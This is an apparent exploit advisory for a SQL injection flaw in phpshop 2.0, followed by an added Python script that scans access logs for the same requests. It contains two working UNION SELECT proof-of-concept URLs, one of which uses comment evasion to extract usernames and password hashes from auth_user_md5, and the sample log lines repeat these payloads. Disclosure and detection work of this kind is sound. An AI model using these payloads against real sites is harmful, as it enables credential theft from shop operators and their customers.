Title: phpshop 2.0 SQL Injection Vulnerability.

Author: onestree
Download: http://code.google.com/p/phpshop/downloads/list
Tested on: Windows 7 / Ubuntu

SQLi p0c:

==================

http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

Fix:
Strengthen filtering.
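
A defender-side check for the two request shapes above, as an added example that is not part of the original advisory: it scans access-log lines for non-integer `module_id` / `product_id` values and flags UNION SELECT even when `/**/` comments stand in for spaces. The log lines are constructed, and treating both parameters as integer ids is an assumption based on the values in the PoC URLs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

NUMERIC_PARAMS = {"module_id", "product_id"}  # assumed to be integer ids
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def classify(value):
    """Return None for a clean integer id, otherwise a reason string."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    # Inline comments replace spaces in the second PoC URL; flatten them
    # to single spaces so one pattern covers both request shapes.
    flat = " ".join(SQL_COMMENT.sub(" ", value).split())
    if UNION_SELECT.search(flat):
        return "union-select in numeric parameter"
    return "non-numeric value in numeric parameter"

def scan(log_lines):
    """Yield (line_number, parameter, reason) for each suspicious request."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes values and turns '+' into a space.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in NUMERIC_PARAMS:
                reason = classify(value)
                if reason:
                    yield number, name, reason

# Constructed access-log lines (not captured traffic); payloads shortened.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /phpshop%202.0/?page=shop/flypage&product_id=1087 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /phpshop%202.0/?page=admin/function_list&module_id=11%27+union+select+1,database(),1+-- HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /phpshop%202.0/?page=shop/flypage&product_id=1087%27/**/union/**/select/**/1,password/**/from/**/auth_user_md5-- HTTP/1.1" 200 903',
    '198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] "GET /phpshop%202.0/?page=shop/flypage&product_id=abc HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```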